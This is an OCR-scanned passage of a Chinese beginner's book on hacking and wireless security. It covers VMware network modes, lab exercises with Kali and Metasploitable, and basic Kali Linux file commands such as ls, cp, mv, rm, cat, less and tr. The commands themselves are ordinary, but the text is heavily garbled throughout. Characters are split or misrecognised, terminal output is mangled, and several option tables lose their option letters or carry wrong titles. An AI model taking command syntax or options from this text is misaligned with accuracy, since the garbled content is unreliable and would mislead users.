在 VMware 菜单 项 中 ， 选 择 “ 虚 拟 
机 ”一 “网 络 适 配器 ”一 “设置 ?” 菜单 命 
令 ， 如 下 图 所 示 。 


虽 远 RED 得 二 (HH) | 则 >| 吧 | 心 


md 9 


| BP 


全 || 口 回 吕 马 | 同 


> Ban 
CI coovoe ， 
- 世人 (UU) Cr+:Sshift+p 
号 六 ctl+Ak+DelE) Es . 
3 抓 束 接 入 内 容 册 ctrl+G Pixart Imaging US8 Optical Mouse 》 
喇 以 SEN) 》 Android > 
执 区 于 要 (C) Cen+Ahk+PrtScn 


打开 “虚拟 机 设置 ”对 话 框 ， 在 其 中 
选择 “网 络 适 配器 ”选项 ， 在 右 侧 可 以 看 
到 “网 络 连接 ”设置 界面 ， 这 里 提供 的 连 
接 方式 有 3 种 ， 如 下 图 所 示 。 


摘 丢 认定 械 态 

4 68 加 已 连 找 (C5) 

4 问 草 骨 ] 这 扶 (D) 

80 GB 

正在 体 用 立 件 D:\Program Ples ,.， 网 站 这 抗 

NAT 中 析 按 村 式 (8): 百 接连 接 物 理 网 络 

腥 制 物理 网 癌 庄 按 扰 记 (P) 

加 | 吕 示 器 图 NAT 梓 式 {N}); 用 二 共享 主机 的 全 地 址 
中 仅 主 机 栖 式 (H): 与 主机 井 字 i 二 用 问 络 
中 自 定 多 (UU); 特定 由 要 网 络 

VMnat0 《自动 材 接 ) 

CLAN 区 段 (L 


Bm/DVD (IDE) 


上 十 醒 计 


上 本 中 
图 U58 坟 审 妇 
明志 上 


高 级 (V)..， 


LAN 区 遍 (5)... 


添加 (A).… 书 8#[R) 


[和 蕉 _ ] Wm 二 


3 种 网 络 连接 方式 介绍 如 下 : 
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搭建 无 线 测试 系统 Kali Linux “人 音 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


(1) 桥接 模式 。 如 果 选 择 该 连接 模式 ， 
虚拟 机 可 以 获取 独立 的 全 地 址 ， 通 过 独立 
IP 地 址 进行 上 网 。 

(2) NAT 模 式 。 如 果 选 择 该 连接 模式 ， 
虚拟 机 将 与 主机 公用 一 个 了 P 地址， 通过 主 
机 IP 地 址 实现 NAT 转换 上 网 。 

(3) 仅 主机 模式 。 如 果 选 择 该 连接 模 
式 ， 虚 拟 机 仅 同 主机 进行 通信 ， 不 能 接 入 
Intenet 外 网 。 
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小 试 身 手 


练习 1: 下 载 并 安装 虚拟 机 软件 。 

练习 2: 下 载 并 安装 Kali 虚 拟 机 ， 同 时 
更 新 Kali 虚 拟 机 到 最 新 。 

练习 3: 配置 CDliunx 虚 拟 机 ， 并 运行 
CDliunx 进 入 桌面 。 

练习 4: 安装 并 运行 Metasploitable 训 机 
系统 。 


3.0 


第 4 音 ”熟悉 无 线 网 络 安全 测试 平 
台 一 一 Kali Linux 系 统 的 基本 操作 


大 多 数 无 线 黑 客 都 会 选择 Kali Linux 作 为 测试 平台 ， 这 是 因为 大 部 分 无 线 黑 客 工 具 都 
是 基于 Kali Linux 系 统 环境 下 的 。 本 草 介绍 Kali Linux 操 作 系 统 的 基本 操作 ， 主 要 包括 Kali 
Linux 系 统 下 的 命令 格式 、 管 理 文件 和 目录 命令 、 文 件 内 容 查看 命令 、 权 限 分 配 操作 命 
令 、 文 本 搜索 操作 命令 等 。 


4.1 Kali Linux 系 统 下 的 命令 (3) 简化 选项 与 完整 选项 。 例 如 
等 于 -all。 
格式 (4) 存在 不 加 选项 单独 执行 的 命令 。 


例如 : cd /etc， 使 用 了 cd 命令 ， 并 没有 加 
入 选项 ， 此 时 /etc 依然 作为 参数 使 用 ， 得 到 
一 个 完整 命令 。 还 有 top， 使 用 top 命令 ， 
并 没有 选取 任何 选项 以 及 参数 ， 但 即使 这 


Kali Linux 命 令 格 式 同 DOS 命 令 格 式 类 
似 ， 不 过 Kali Linux 命 令 是 区 分 大 小 写 的 ， 这 
一 点 需要 注意 。Kali Linux 命 令 格 式 如 下 : 


| 样 它 依然 是 一 条 完整 的 命令 。 
例如 : 由 此 可 以 看 出 Kali Linux 的 命令 可 以 
ge 选择 加 入 一 0 也 可 以 独立 运 


了 -] 选 项 与 -a 选 项 ， 多 个 选项 写 在 一 起 ， 后 
面 /etc 作 为 一 个 参数 传 入 进来 ， 得 到 一 个 完 4.2 ”管理 文件 和 目录 命令 


A 管理 文件 和 目录 的 命令 是 Kali Linux 系 
外 ， 在 使 用 Kali Linux 命 令 时 ， 需 要 人 之 不 Kall LInux 系 
让  ” 统 中 常用 的 一 些 命令 ， 掌 握 这 些 命令 的 使 


用 方法 ， 可 以 帮助 用 户 提 高 使 用 Kali Linux 
(1) 有 一 些 个 别提 此 
格式 。 昌 PR 操作 系统 的 能 力 。Kali Linux 管 理 文件 和 目 


用 的 俞 今 几 
(2) 当 有 多 个 选项 时 ， 可 以 写 在 一 起 。 到 的 会 邻 人 下 才 。 
表 Kali 和 


pwd 显示 目前 的 目录 列 出 目录 


mkdir 创建 一 个 新 的 目录 P= 移动 文件 或 目录 
mm 移 除 文件 或 目录 mdir | 贡 除 一 个 空 的 目录 


4.2.1 ls 
ls 命令 用 来 查看 目录 的 内 容 。 语 法 格式 如 下 : 


~ 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈 超 值 版 ) 


ls 选项 [-ald] [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 


表 ls 命令 参数 介绍 
选 项 含 义 
-a 显示 目录 中 的 全 部 文件 ， 包 括 隐藏 文件 
-| 显示 目录 中 的 细节 ， 包 括 权 限 、 所 有 者 、 组 群 、 大 小 、 创 建 日 期 、 文 件 是 否 是 链接 等 
工 从 后 同 前 依次 列 出 目录 中 内 容 
-t 将 文件 依 建 立时 间 的 先后 次 序列 出 
二 显示 列 出 文件 的 文件 类 型 
-S 按照 文件 的 大 小 排序 文件 
-R 该 选项 以 递归 方式 列 出 当前 目录 下 所 有 子 目 录 内 的 内 容 
-h 以 可 读 的 方式 显示 文件 的 大 小 ， 如 用 KK、M、G 作 单位 


例如 : 使 用 ls -al 命 令 ， 来 显示 目录 中 
全 部 文件 的 详细 信息 ， 下 图 为 执行 效果 ， 
这 里 截取 了 部 分 文件 信息 ， 其 中 ， 左 侧 显 
示 的 是 目录 或 文件 的 权限 信息 ， 第 一 个 root 
是 文件 的 所 有 者 信息 ， 第 二 个 root 是 文件 的 
所 有 者 所 在 的 所 属 组 信息 。 


root@kali:-# [Ls -BaL 
总 用 量 394 
drwxr-xr-x 29 root root 4096 1 月 29 22:13 . 

drwxr-xr-xX 26 root root 36864 196 日 27 21:36 .. 

-rw------- 1 root root 39728 10F 36 3:05 .bash history 
-rw-r--r-- 1 root root 339l1 7 月 31 94:18 .bashrc 
drwxr-xr-x 2 root root 4996 19 日 26 bb1:39 .bully 
drwx------ 17 root root 4096 1 月 29 04:35 .cache 
drwxr-xr-x 3 root root 4996 19 月 22 90:58 .chirp 
Hrwxr-xr-x 22 root root 4D96 16 月 29 OB7:57 .confi 
drwxr-xr-x 5 root root 4996 16 月 10 92:59 .designer 
Hrwxr-xr-X 3 root root 4996 19 月 8 94:37 Desktop 
drwxr-xr-x 2 root root 4096 8 月 21 97:;:95 Documents 


drwxr-xr-xX 5 root root 4096 1 日 36 91:06 Downloads 
UrWX------ 3 root root 4936 6 月 zl 97:05 .gnupg 


eas 4.2.2 mkdir 


mkdir 命 令 用 来 建立 目录 ， 目 录 名 称 需 
要 使 用 参数 给 定 。 语 法 格式 如 下 : 


mkdir -p [目录 名 ] 


其 中 ， 参 数 -p 表 示 递 归 创建 目录 。 
例如 : 使 用 mkdir 命 令 创建 一 个 名 称 为 
temp 的 目录 ， 输 入 的 创建 命令 如 下 : 


mkdir temp 


按 Enter 键 ， 下 图 为 执行 效果 。 


root@kali:~# Ls 

F Documents Music 
besktop Downloads Pictures 
root@kali:-# mkdir temp 
root@kali:-~# ls 

F Documents Music Public Templates Videog 
Desktop Downloads Pictures temp Test 


Public Test 
Templates Videos 


46 


例如 : 使 用 mkdir -p 创 建 一 个 名 称 为 
test/001 test/002 的 递归 目录 ， 这 里 输入 的 创 
建 命令 如 下 : 


mkdir -p test/001 test/002 


按 Enter 键 ， 下 图 为 执行 效果 。 


root@kali:-~# mkdir -p test/001 test/602 
root@kali:~# ls 

Desktop Downloads Pictures Templates Test 
Documents Music Public test Videog 
root@kali:-~# ls test 
O01 O02 


4.2.3 rmdir 


rmdir 用 于 删除 空 目 录 。 命 令 格 式 
如 下 : 


rmdir [目录 名 ] 


例如 : 这 里 删除 一 个 名 称 为 001 空 目 
录 ， 这 里 输入 的 删除 空 目录 命令 如 下 : 


rmdirn O00 


按 Enter 键 ， 下 图 为 执行 效果 。 


root@kali:~# cd test 
root@kali:~/test# ls 

O01 002 

root@kali:~/test# rmdir 001 
root@kali:~/test# ls 

QA02 


4.2.4 cd 


cd 命令 用 于 切换 当前 工作 目录 至 
dirName (目录 参数 ) 。 其 中 dirName 表 示 


法 可 为 绝对 路 径 或 相对 路 径 。 奉 目录 名 称 ， 目录， 该 命令 比较 简单 也 没有 选项 


悉 无 线 网 络 安全 测试 平台 一 Kali Linux 系 统 的 基本 操作 


下 图 


省 略 ， 则 变换 至 使 用 者 的 home 目 录 ， 也 就 ”为 运行 命令 后 的 显示 结果 。 


是 刚 登 录 时 所 在 的 目录 。 命 令 格式 如 下 : 
cd [目录 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”cd 命令 参数 介绍 
选 项 含 义 
~ 表示 为 home 目 录 
表示 目前 所 在 的 目录 
表示 目前 目录 位 置 的 上 一 层 目 录 


如 果 要 切换 到 的 目标 目录 是 一 个 符号 链 
上 | 接 ， 直 接 切 换 到 符号 链接 指向 的 目标 目录 


如 果 要 切换 的 目标 目录 是 一 个 符号 的 链 
L 接 ， 直 接 切 换 到 字符 链接 名 代表 的 目录 ， 
而 非 符号 链接 所 指向 的 目标 目录 


当 仅 使 用 “-” 一 个 选项 时 ， 当 前 工作 目 
- 录 将 被 切换 到 环境 变量 OLDPWD 所 表示 的 
目录 


使 用 cd 加 上 目录 名 称 可 以 切换 到 相应 
的 目录 ， 例 如 : 使 用 cd ~ 可 以 切换 到 当前 用 
户 的 主 目录 ， 如 下 图 所 示 。 


oot@Kkali:~# pwd 
root 
oot@kali:~# cd /honme 
oot@kali:/home# cd ~ 
oot@kali:~# pwd 
root 


如 果 使 用 cd 加 上 绝对 路 径 可 以 直接 切 
换 到 相应 的 目录 ， 每 加 入 “..” 可 以 退出 一 
层 ， 如 下 图 所 示 。 


de 全 cd /usr/share/john 
oot@kali:/usr/share/ijohn# cd ../../.. 


4.2.5 pwd 


pwd 命 令 以 绝对 路 径 的 方式 显示 用 户 当 
前 工作 目录 。 命 令 将 当前 目录 的 全 路 径 名 
称 〈 从 根 目 录 ) 写 入 标准 输出 。 全 部 目录 
使 用 “/” 分 隔 。 第 一 个 /表示 根 目 录 ， 最 后 
一 个 目录 是 当前 目录 。 执 行 pwd 命 令 可 立刻 
获取 当前 用 户 所 在 的 工作 目录 的 绝对 路 径 
名 称 。 命 令 格式 如 下 : 


pwd 


例如 : 使 用 pwd 命 令 ， 可 以 显示 出 当前 


Desktop 


/root 


Documents Music 
rootGkaLi :~# pwd 


root@kali:~# 1s 


Downloads Pictures Templates Test 
Public test Videos 


移 提 示 : 为 了 区 分 目录 信息 ， 可 以 先 使 用 ls 


列 出 目录 信息 。 


4.2.6 cp 让 
cp 命令 主要 用 于 复制 文件 或 目录 。 命 部 党委 


令 语 法 格式 如 下 : 
cp -rp [原文 件 或 目录 ] [目标 目录 ] 


命令 中 选项 


选 项 


页 的 参数 介绍 见 下 表 。 
令 参 数 介 绍 
含 义 


此 选项 通常 在 复制 目录 时 使 用 ， 它 保留 
链接 、 文 件 属性 ， 并 复制 目录 下 的 所 有 
内 容 。 其 作用 等 于 dpR 选 项 组 合 


复制 时 保留 链接 。 这 里 所 说 的 链接 相当 


表 ”cp 命令 


| 于 windows 系 统 中 的 快捷 方式 

二 覆盖 已 经 存在 的 目标 文件 而 不 给 出 提示 
与 -{ 选 项 相反 ， 在 覆盖 目标 文件 之 前 给 出 

- 提示 ， 要 求 用 户 确认 是 否 覆 盖 ， 回 答 y 时 
目标 文件 将 被 覆盖 

_ 除 复制 文件 的 内 容 外 ， 还 把 修改 时 间 和 

| 访问 权限 也 复制 到 新 文件 中 

| 着 给 出 的 源 文件 是 一 个 目录 文件 ， 此 时 
将 复制 该 目录 下 所 有 的 子 目 录 和 文件 

-l 不 复制 文件 ， 只 是 生成 链接 文件 

例如 : 使 用 cp 命令 加 -r 选 项 页 复制 目录 到 

指定 目录 ， 下 图 为 执行 效果 。 

oem ~ 大 [Ls | 

pesktop pornlonds Picture: temp Test 

ee eh deh de 

root@kali:-# ls temp 

例如 : 使 用 cp 命令 ， 复制 文件 到 目 


录 ， 下 图 为 执行 效果 。 
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oot@Kkali:~# touch 601.txt 
oot@kali:-# ls 
n Desktop 
0l.txt Documents 
oot@kali:-~# cp 061.txt temp 
O * 汪 - ls temp 


Pictures 


DownlLoads 
Musi Public 


temp Test 
Templates Videos 


01.txt Test 


ft mv 命令 用 来 对 文件 或 目录 重新 命名 ， 
或 者 将 文件 从 一 个 目录 移 到 另 一 个 目录 
中 。source 表 示 源 文件 或 目录 ，target 表 示 目 
标 文 件 或 目录 。 如 果 将 一 个 文件 移 到 一 个 
己 经 存在 的 目标 文件 中 ， 则 目标 文件 的 内 
容 将 被 覆盖 。 命 令 语 法 格式 如 下 : 
mv[ 原 文件 或 目录 ] [目标 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 mv 命令 参数 介绍 
选 项 


含义 
， “| 着 指定 目录 已 有 同名 文件 ， 则 先 询问 是 
否 覆盖 昌文 件 
| 在 mv 操作 要 覆盖 某 已 有 的 目标 文件 时 不 
给 任何 指示 
使 用 mv 命令 将 源 文件 被 移 至 目标 文件 
有 以 下 两 种 不 同 的 结果 : 


e 如 果 目 标 文 件 是 到 茶 一 目录 文件 的 
路 径 ， 源 文件 会 被 移 到 此 目录 下 ， 
且 文 件 名 不 变 。 如 果 目 标 文 件 不 是 
目录 文件 ， 则 源 文 件 名 《只 能 有 一 
个 ) 会 变 为 此 目标 文件 名 ， 并 和 莉 亲 
已 经 存在 的 同名 文件 。 

e 如 果 源 文件 和 目标 文件 在 同一 个 目 
录 下 ，mv 的 作用 就 是 改 文件 名 。 当 
目标 文件 是 目录 文件 时 ， 源 文件 或 
目录 参数 可 以 有 多 个 ， 则 所 有 的 源 
文件 都 会 被 移 至 目标 文件 中 。 所 有 
移 到 该 目录 下 的 文件 都 将 保留 以 前 
的 文件 名 。 


全 注意 : mv 命令 与 cp 命令 的 执行 效果 不 


同 》 mv 的 作用 是 前 切 ， 文件 个 数 并 未 增 
加 。 而 cp 对 文件 进行 复制 ， 文 件 个 数 增 
加 了 。 


例如 : 首先 查看 两 个 目录 ， 然 后 使 用 
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mV 命令 ， 将 其 中 一 个 目录 剪 切 走 ， 下 图 为 
运行 效果 。 


root@kali:-~# ls test 


root@kali:~# ls Test 

2 3 4 port Service test 
root@kali:-# mv test/002 Test 
root@kali:-# ls Test 

002 2 3 4 port Service test 
root@kali:-~# ls test 

root@kali:~# 


例如 : 使 用 mv 命令 对 文件 进行 重 命 
名 ， 下 图 为 执行 效果 。 


root@kali:~/temp# ls 

e061.txt Test 

root@kali:~/temp# mv 9061.txt 0Q02.txt 
root@kali:~/temp# ls 

B82.txt Test 


4.2.8 rm 


rm 命令 用 于 删除 一 个 文件 或 者 目录 。 
命令 语法 格式 如 下 : 
rm -E [文件 或 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 rm 命令 参数 介绍 
选 项 含 义 
二 删除 前 逐一 询问 确认 
即使 源 文件 为 只 读 属 性 ， 也 直接 删除 ， 
不 确认 
有 将 目录 及 以 下 文件 递归 删除 


例如 : 使 用 rm 命令 加 上 -i 选项 ， 在 删除 
文件 时 会 进行 询问 ， 下 图 为 执行 效果 。 
root@kali:~/temp# touch 001.txt 
root@kali:~/temp# ls 
e901l.txt Test 
root@kali:~/temp# rm -i 001.txt 
rm: 是 否 删 除 普 通 空 文件 '991.txt'? y 
root@kali:~/temp# ls 
Test 


例如 : 如 果 使 用 rm 命令 -fr 选项 会 递归 
删除 ， 该 命令 初学 者 使 用 时 需要 慎重 ， 否 
则 可 能 误 删 除 比 较 重 要 的 文件 导致 系统 裔 
涡 ， 下 图 为 递归 删除 目录 的 执行 效果 。 


root@kali:~# mv Test/002 test 
root@kali:~# rm test 

rm: 无 法 删除 'test': 是 一 个 目录 
root@kali:~# rm -r test 
root@kali:~# ls 

Desktop Documents Downloads Music Pictures 
Public Templates Test Videos 


-f 
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4.3 ”文件 内 容 查 看 命令 


文件 内 容 查 看 命令 可 以 方便 对 文件 内 
容 进行 查看 ，Kali Linux 给 出 了 丰富 的 文件 
查看 命令 ， 通 过 这 些 命令 可 以 快速 地 查看 
想 要 的 文件 信息 。Kali Linux 中 文件 内 容 查 
看 命令 见 下 表 。 
表 ”Kali Linux 中 文件 查看 命令 


命 令 功 能 
cat 由 第 一 行 开 始 显示 文件 内 容 
tac 从 最 后 一 行 开 始 显示 ， 与 cat 功 能 相反 
nl 显示 内 容 时 ， 输 出 内 容 的 行 号 
more 一 页 一 页 地 显示 文件 内 容 
head 只 看 头 几 行 
tail 只 看 末尾 几 行 
less 与 more 类 似 ， 但 可 以 往 前 翻 页 
4.3.1 cat 


cat 命 令 用 于 连接 文件 并 打印 到 标准 输 
出 设备 上 ，Kali Linux 系 统 中 有 多 个 用 于 查 
看 文本 内 容 的 命令 ， 每 个 命令 都 有 目 己 的 特 
点 ， 例 如 : 这 个 cat 命 令 就 是 用 于 查看 内 容 
较 少 的 纯 文 本 文件 的 。 命 令 语法 格式 如 下 : 

cat [-AbEnTv] [文件 名 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 


表 cat 命令 参数 介绍 


选 项 含义 

相当 于 -vET 的 整合 选项 ， 可 列 出 一 些 特 

| 殊 字 符 而 不 是 空白 而 已 

列 出 行 号 ， 仅 针对 非 空 白 行 作 行 号 显 
示 ， 空 白 行 不 标 行 号 

E 将 结尾 的 断 行 字 节 $ 显 示 出 来 

列 印 出 行 号 ， 连 同 空白 行 也 会 有 行 号 ， 

| 与 -b 的 选项 不 同 

a 将 Tab 按 键 以 人 显示 出 来 

Vy 列 出 一 些 看 不 出 来 的 特殊 字符 


这 个 命令 比较 简单 用 于 显示 内 容 ， 加 
入 -n 选 项 可 以 实现 带 行 号 输出 ， 右 上 图 为 运 
行 实例 。 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 ER 


root@kali:~# cat -n /etc/issue 
1 Kali GNU/Linux Rolling Nn \\ 
2 

root@kali:-~# cat /etc/issue 

ali GNU/Linux Rolling \n \\ 


4.3.2 tac 


tac 与 cat 命 令 刚 好 相反 ， 文 件 内 容 作品 时 肌 
最 后 一 行 开 始 显示 ， 可 以 看 出 tac 是 cat 的 
倒 着 写 。 


tac [-AbEnTv] [文件 名 ] 


为 了 对 比 tac 与 cat 命 令 的 区 别 ， 这 里 使 
用 tac 命 令 查 看 与 cat 命 令 一 样 的 文件 ， 下 图 为 
执行 效果 ， 可 以 看 到 cat 显 示 一 行文 本 一 行 空 
白 ，tac 先 显示 一 行 空 白 再 显示 文本 。 


root@kali:-~# cat /etc/issue 
Kali GNU/Linux Rolling \n \\ 


root@kali:~# tac /etc/issue 


Kali GNU/Linux Rolling \n NU 


4.3.3 more 


本 内 容 ， 并 在 最 下 面 使 用 百分比 的 形式 来 六 0 光 
提示 已 经 阅读 了 多 少 内 容 。 命 令 语法 格式 
如 下 ; 


more [-dlfpcsul 
[+linenum] [文件 名 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 more 命 令 参 数 介 绍 


[-num] [+/pattern] 


选 项 含义 

+n 从 第 n 行 开始 显示 

-n 定义 屏幕 大 小 为 n 行 
在 每 个 档案 显示 前 搜寻 该 字 串 (pat- 

+/pattern 、 
tem) ， 然 后 从 该 字 串 前 两 行 之 后 开始 显示 

-Cc 从 顶部 清 屏 ， 然 后 显示 

本 提示 按 空 格 键 继续 ， 按 Q 键 退出 ， 禁 用 响 
铃 功 能 

忽略 Ctrl+L ( 换 页 ) 字符 

通过 清除 窗口 而 不 是 滚屏 来 对 文件 进行 换 

上 页 ， 与 -c 选 项 相似 

-S 把 连续 的 多 个 空 行 显示 为 一 行 

-U 把 文件 内 容 中 的 下 画 线 去 掉 
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例如 : 使 用 more 命 令 查 看 文本 全 部 内 
容 ， 下 图 为 执行 效果 。 


FF NetworKk services, Internet styte 
= 


ER Note that it is presently the policy of IANA to assign a single well-known 
Eport number for both TCP and UDP; hence, officially ports have two entries 
RR even if the protocol doesn't support UDP operations. 

的 
RE Updated from http://www.iana.org/assignments/port-numbers and other 

‘EE sources like http://www.freebsd.org/cgi/cvsweb.cgi/src/etc/services . 

EE New ports will be added on request if they have been officially assigned 
EE by IANA and used in the real-world or are Needed by a debian package. 

# If you need a huge list of Used numbers please install the nmap package. 


tcpmux l/tcp # TCP port service multiplexer 
echo 7/tcp 
echo 7/udp 
discard 9/tcp sink null 
discard 9/udp sink null 
Systat 11/tcp Users 
daytime 13/tcp 
Haytime 13/udp 
netstat 15/tcp 
qotd 17/tcp quote 
# message send protocol 


msp 18/tcp 


一 般 情 况 下 ， 一 页 并 不 能 显示 文本 
的 全 部 内 容 ， 这 时 就 可 以 使 用 下 面 的 按键 
来 查看 未 显示 的 内 容 ， 常 用 的 按键 说 明 见 
下 表 。 


表 常用 的 按键 说 明 
按键 功 能 
空白 键 (space) | 代表 向 下 翻 一 页 
代表 向 下 翻 一 行 


Enter 


代表 在 这 个 显示 的 内 容 当 中 ， 风 下 


i 搜寻 “ 字 串 ”这 个 关键 字 


立刻 显示 出 文件 名 以 及 目前 显示 的 
行 数 


向 下 滚动 一 屏 

= 输出 当前 行 的 行 号 

V 调用 vi 编辑 器 

调用 Shell， 并 执行 命令 


Q 退出 more， 不 再 显示 该 文件 内 容 


less 

a less 与 more 类 似 ， 但 使 用 less 可 以 随意 
浏览 文件 ， 而 more 仅 能 向 前 移动 ， 却 不 能 

回 后 移动 ， 而 且 less 在 查看 之 前 不 会 加 载 整 

个 文件 。 命 令 语 法 格式 如 下 : 

[文件 名 ] 

命令 中 选项 的 参数 介绍 见 右 表 。 


less 


30 


表 
选 项 
-b < 缓冲 区 大 小 > 


-€ 


-f 


几 
-1 
-m 


N 


-0 < 文件 名 > 


-Q 


u 
空格 键 
Enter 键 
PageDown 


PageUp 


例如 : 使 用 less 查 看 文本 内 容 ， 


执行 效果 。 


less 命 令 参数 介绍 

含 义 
设置 缓冲 区 的 大 小 
当 文件 显示 结束 后 ， 自 动 离开 


强迫 打开 特殊 文件 ， 例 如 外 围 设 
备 代 号 、 目 录 和 二 进 制 文件 


只 标志 最 后 搜索 的 关键 词 
忽略 搜索 时 的 大 小 写 

显示 类 似 more 命 令 的 百分比 
显示 每 行 的 行 号 


将 less 输 出 的 内 容 在 指定 文件 中 保 
存 起 来 


不 使 用 警告 音 
显示 连续 空 行为 一 行 

行 过 长 时 间 将 超出 部 分 舍弃 
将 tab 键 显示 为 规定 的 数字 空格 
同 下 搜索 “字符 串 ” 的 功能 
同上 搜索 “字符 串 ” 的 功能 
重复 前 一 个 搜索 

反 回 重复 前 一 个 搜索 
向 后 翻 一 页 

同 后 翻 半 页 

显示 帮助 界面 

退出 less 命 令 

同 前 深 动 半 页 

向 前 滚动 一 行 

滚动 一 页 

滚动 一 行 

向 下 翻动 一 页 

向 上 翻动 一 页 


下 图 为 
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Ecpm I7tcp # TCP porE service muLtIPLEXE 
h 7/tcp 
h 7/udp 

Hiscar d g/tcp sink null 

Hiscard 9/udp sink null 

Bystat ll/tcp USers 

Hiaytime 13/tcp 

Haytime 13/Udp 

etstat 15/tcp 

notd 17/tcp quote 

msp l8/tcp # me55age send protocol 

msp 18/udp 

harger l9/tcp ttytst source 

charg 1l19/udp ttytst source 

ftp-dat 28/tcp 

ftp 21/tcp 

fsp 21/udp fspd 

ssh 22/tcp 六 SSH Remote Login Protocol 

kelnet 23/tcp 

smtp 25/tcp il 

Fime 37/tcp t 

:有 


4.3.5 head 


head 命 令 用 于 查看 纯 文本 文档 的 前 n 
行 ， 命 令 语 法 格式 如 下 : 


[文件 名 ] 


命令 中 选项 的 参数 为 -n， 用 于 指定 
行 数 。 

使 用 该 命令 可 以 设 定 显示 部 分 内 容 ， 
内 容 从 头 开始 -n 选 项 指定 截止 行 数 ， 例 如 : 
查看 一 个 文本 的 前 $ 行 ， 运 行 head 命 令 
图 为 执行 效果 。 


Footakal1i:~# head -hn 5 /etc/services 
# Network services, Internet style 


head 


Note that it is presently zhe policy of IANA to assign a single well-know 
有 port number for both TCP and UDP; hence, se ports have two entrie 
even if the protocol dossn't support UDP operati 


4.3.6 tall 


tail 命 令 用 于 查看 文本 末尾 内 容 ， 与 
head 命 令 正 好 相反 ， 命 令 语法 格式 如 下 : 
[文件 名 ] 

命令 中 选项 的 参数 为 -n 与 -f， 其 中 -n 用 
于 指定 行 数 ，-f 动 态 显 示 文 件 末 尾 内 容 。 

tall 命 令 多 用 于 查看 日 志文 件 ， 因 为 日 
志文 件 是 变动 的 且 日 志 都 依次 从 尾部 加 入 ， 
例如 :， 运行 tail -n 5 /etc/services 命 令 来 查看 文 
件 末 尾 内 容 ， 下 图 为 执行 效果 。 


8 
ircproxy 


1 Er Il 


57000/tcp # Detachzble IRC Proxy 
trido 69177/tcp # fidonet EMSI over telnet 
60179/tcp # fidonet EMSI over TCP 


ido 
, Local services 


其 他 文件 操作 命令 


除了 查看 文件 内 容 命 令 外 ，Kali Linux 
还 提供 了 一 些 其 他 的 文件 操作 命令 ， 使 用 


4.4 


无 线 网 络 安 全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


这 些 命令 可 以 过 滤 转 化 文本 中 的 字符 。Kali 
Linux 中 其 他 文件 操作 命令 见 下 表 。 
表 ”Kali Linux 中 其 他 文件 操作 命令 


命 令 功 能 
tr 转换 或 删除 文件 中 的 字符 
wc 统计 文本 的 行 数 、 字 数 、 字 节 数 等 
di 位 比较 文件 的 差异 
file 查看 文件 类 型 
cut 截取 文本 中 想 要 的 内 容 
stat 查看 文件 的 存储 信息 和 时 间 等 信息 
dd 读 取 、 转 换 并 输出 数据 
4.4.1 tr 


: i 全 站 
Kali Linux 系 统 中 的 tr 命令 用 于 转换 或 天 区 i 
删除 文件 中 的 字符 ，tr 指 令 从 标准 输入 设备 
读 取 数 据 ， 经 过 字符 串 转译 后 ， 将 结果 输 
出 到 标准 输出 设备 。 命 令 语法 格式 如 下 : 


tr [-cdst][--help] [--version] [第 一 字 


符 集 ] [第 二 字符 集 ] 
tr [OPTION]…SET1[SET2] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 tr 命令 参数 介绍 


选 项 含 义 
二 反选 设 定 的 字符 
-d 删除 指令 字符 
让 缩减 连续 重复 的 字符 成 指定 的 单个 字符 
削减 SET1 指 定 范围 ， 使 之 与 SET2 设 定 
长 度 相等 
--help 显示 程序 用 法 信息 
--version 显示 程序 本 喘 的 版 本 信息 


有 时 想 要 快速 地 蔡 换 文本 中 的 一 些 词 
汇 ， 又 或 者 把 整个 文本 内 容 部 进行 蔡 换 ， 
如 果 进 行 手工 蔡 换 工作 量 太 大 。 这 时 就 可 
以 先 使 用 cat 命 令 读 取 符 处 理 的 文本 ， 然 后 
通过 管道 待 “|”， 把 这 些 文本 内 容 传递 给 fr 
命令 ， 最 后 进行 蔡 换 操作 即 可 。 

例如 : 使 用 tr 对 文本 内 容 进行 大 小 写 转 
换 ， 下 图 为 命令 执行 效果 。 
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root@kali:~/temp# Vi 001.txt 
root@kali:~/temp# cat 001.tXxt 

hello linux 

root@kali:~/temp# cat 09001.txt | tr a-z A-Z 
HELLO LINUX 


机 Kali Linux 系 统 中 的 wc 命令 用 于 统计 文 
本 的 行 数 、 字 数 、 字 节 数 等 。 命 令 语法 格 

式 如 下 : 
wc [-clw][--help][--version] [文件 ...] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 trs 命 令 参数 介绍 


选 项 含 义 
-C 只 显示 Bytes 数 
-] 只 显示 行 数 
-W 只 显示 字数 


例如 : 使 用 wc 命令 查看 文本 中 的 行 数 
字数 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# cat 001.txt | wc -d 
12 

root@kali:~/temp# cat O001.txt |wc -\ 

1 

root@kali:~/temp# cat O01.txt |wc -w 

2 


i 4.4.3 cut 


ee: 在 Kali Linux 系 统 中 ， 如 何 准 确 地 提 
到 摇 志 虽 取出 最 想 要 的 数据 ， 这 也 是 用 户 应 该 重 斥 
尖刀 学 习 的 内 容 。 一 般 情况 下 ， 按 基于 “ 行 ” 
”的 方式 来 提取 数据 是 比较 简单 的 ， 只 要 
设置 好 要 搜索 的 关键 词 即 可 。 但 是 如 果 按 
“ 列 ” 搜 索 文本 ,不仅 要 使 用 -f 选 项 来 设 
置 需 要 看 的 列 数 ， 还 需要 使 用 -d 选 项 来 设 
置 间 隅 符号 。 不 过 ， 使 用 cut 命 令 则 可 以 快 
速 截取 文本 中 想 要 的 内 容 。 命 令 语法 格式 
如 下 : 
cut [-bn] [file] 
cut [-c] [file] 
cut [-df] [file] 


命令 中 选项 的 参数 介绍 见 下 表 。 


J 


表 ”trs 命 令 参 数 介 绍 


选 项 含义 
-b 以 字 节 为 单位 进行 分 割 
-C 以 字符 为 单位 进行 分 割 
-d 自 定 义 分 隔 符 ， 默 认为 制 表 符 
二 与 -d 一 起 使 用 ， 指 定 显 示 哪 个 区 域 
